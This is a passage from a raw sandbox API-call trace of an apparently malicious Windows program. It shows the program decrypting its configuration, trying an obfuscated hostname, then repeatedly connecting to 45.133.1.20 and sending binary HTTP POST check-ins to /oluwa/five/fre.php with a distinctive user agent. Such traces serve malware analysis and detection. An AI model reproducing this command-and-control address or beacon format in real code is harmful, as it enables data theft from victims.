0x6a0000 [0219.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0219.313] send (s=0x650, buf=0x6b5c98*, len=242, flags=0) returned 242 [0219.314] send (s=0x650, buf=0x6bb998*, len=159, flags=0) returned 159 [0219.314] GetProcessHeap () returned 0x6a0000 [0219.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0219.314] recv (in: s=0x650, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0219.395] GetProcessHeap () returned 0x6a0000 [0219.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0219.396] GetProcessHeap () returned 0x6a0000 [0219.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0219.396] GetProcessHeap () returned 0x6a0000 [0219.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0219.397] GetProcessHeap () returned 0x6a0000 [0219.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0219.397] closesocket (s=0x650) returned 0 [0219.397] GetProcessHeap () returned 0x6a0000 [0219.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0219.398] GetProcessHeap () returned 0x6a0000 [0219.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.398] GetProcessHeap () returned 0x6a0000 [0219.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0219.398] GetProcessHeap () returned 0x6a0000 [0219.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0219.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x99c) returned 0x650 [0219.400] Sleep (dwMilliseconds=0xea60) [0219.402] GetProcessHeap () returned 0x6a0000 [0219.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0219.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.404] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.411] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0219.419] GetProcessHeap () returned 0x6a0000 [0219.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0219.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.420] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0219.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.421] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.422] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.422] GetProcessHeap () returned 0x6a0000 [0219.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0219.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.440] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0219.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.441] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0219.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.442] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0219.442] GetProcessHeap () returned 0x6a0000 [0219.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.443] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.446] GetProcessHeap () returned 0x6a0000 [0219.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0219.446] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0219.447] GetProcessHeap () returned 0x6a0000 [0219.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0219.448] GetProcessHeap () returned 0x6a0000 [0219.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.448] GetProcessHeap () returned 0x6a0000 [0219.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0219.449] GetProcessHeap () returned 0x6a0000 [0219.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0219.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.451] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0219.468] GetProcessHeap () returned 0x6a0000 [0219.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0219.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.469] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0219.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.472] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.473] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.473] GetProcessHeap () returned 0x6a0000 [0219.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0219.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.475] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0219.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.475] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0219.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.476] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0219.476] GetProcessHeap () returned 0x6a0000 [0219.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.477] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0219.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.478] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0219.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.479] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0219.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.480] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0219.480] GetProcessHeap () returned 0x6a0000 [0219.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0219.484] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0219.485] GetProcessHeap () returned 0x6a0000 [0219.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0219.485] socket (af=2, type=1, protocol=6) returned 0x654 [0219.485] connect (s=0x654, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0219.512] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0219.512] GetProcessHeap () returned 0x6a0000 [0219.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0219.512] GetProcessHeap () returned 0x6a0000 [0219.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0219.514] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.515] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0219.515] GetProcessHeap () returned 0x6a0000 [0219.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0219.515] GetProcessHeap () returned 0x6a0000 [0219.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0219.516] GetProcessHeap () returned 0x6a0000 [0219.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0219.516] GetProcessHeap () returned 0x6a0000 [0219.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0219.517] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.517] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0219.517] GetProcessHeap () returned 0x6a0000 [0219.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0219.517] GetProcessHeap () returned 0x6a0000 [0219.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0219.518] send (s=0x654, buf=0x6b5c98*, len=242, flags=0) returned 242 [0219.518] send (s=0x654, buf=0x6bb998*, len=159, flags=0) returned 159 [0219.519] GetProcessHeap () returned 0x6a0000 [0219.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0219.519] recv (in: s=0x654, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0219.587] GetProcessHeap () returned 0x6a0000 [0219.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0219.588] GetProcessHeap () returned 0x6a0000 [0219.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0219.590] GetProcessHeap () returned 0x6a0000 [0219.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0219.592] GetProcessHeap () returned 0x6a0000 [0219.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0219.592] closesocket (s=0x654) returned 0 [0219.593] GetProcessHeap () returned 0x6a0000 [0219.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0219.594] GetProcessHeap () returned 0x6a0000 [0219.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.594] GetProcessHeap () returned 0x6a0000 [0219.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0219.595] GetProcessHeap () returned 0x6a0000 [0219.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0219.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd30) returned 0x654 [0219.598] Sleep (dwMilliseconds=0xea60) [0219.599] GetProcessHeap () returned 0x6a0000 [0219.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0219.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0219.838] GetProcessHeap () returned 0x6a0000 [0219.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0219.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.840] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0219.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.842] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.846] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.846] GetProcessHeap () returned 0x6a0000 [0219.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0219.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.848] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0219.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.849] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0219.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.851] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0219.851] GetProcessHeap () returned 0x6a0000 [0219.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.852] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.853] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.859] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.859] GetProcessHeap () returned 0x6a0000 [0219.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0219.859] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0219.859] GetProcessHeap () returned 0x6a0000 [0219.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0219.859] GetProcessHeap () returned 0x6a0000 [0219.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.860] GetProcessHeap () returned 0x6a0000 [0219.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0219.860] GetProcessHeap () returned 0x6a0000 [0219.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0219.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.872] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0219.882] GetProcessHeap () returned 0x6a0000 [0219.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0219.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.884] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0219.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.885] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.886] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.886] GetProcessHeap () returned 0x6a0000 [0219.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0219.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.891] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0219.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.892] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0219.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.902] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0219.902] GetProcessHeap () returned 0x6a0000 [0219.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.903] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0219.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.904] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0219.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.905] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0219.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.906] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0219.906] GetProcessHeap () returned 0x6a0000 [0219.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0219.907] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0219.907] GetProcessHeap () returned 0x6a0000 [0219.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0219.907] socket (af=2, type=1, protocol=6) returned 0x658 [0219.907] connect (s=0x658, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0219.932] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0219.932] GetProcessHeap () returned 0x6a0000 [0219.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0219.932] GetProcessHeap () returned 0x6a0000 [0219.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0219.933] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.934] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0219.934] GetProcessHeap () returned 0x6a0000 [0219.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0219.934] GetProcessHeap () returned 0x6a0000 [0219.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0219.935] GetProcessHeap () returned 0x6a0000 [0219.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0219.935] GetProcessHeap () returned 0x6a0000 [0219.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0219.936] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.936] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0219.936] GetProcessHeap () returned 0x6a0000 [0219.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0219.937] GetProcessHeap () returned 0x6a0000 [0219.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0219.937] send (s=0x658, buf=0x6b5c98*, len=242, flags=0) returned 242 [0219.938] send (s=0x658, buf=0x6bb998*, len=159, flags=0) returned 159 [0219.938] GetProcessHeap () returned 0x6a0000 [0219.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0219.938] recv (in: s=0x658, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0220.084] GetProcessHeap () returned 0x6a0000 [0220.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0220.084] GetProcessHeap () returned 0x6a0000 [0220.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0220.085] GetProcessHeap () returned 